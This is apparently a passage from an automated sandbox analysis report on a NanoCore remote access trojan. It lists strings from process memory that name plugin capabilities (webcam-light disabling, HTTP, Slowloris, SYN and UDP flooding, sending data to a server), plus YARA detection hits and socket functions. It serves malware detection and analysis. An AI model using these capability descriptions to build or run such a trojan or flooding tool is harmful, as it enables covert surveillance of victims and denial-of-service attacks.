e.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 7_2_002D2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 7_2_002D1B61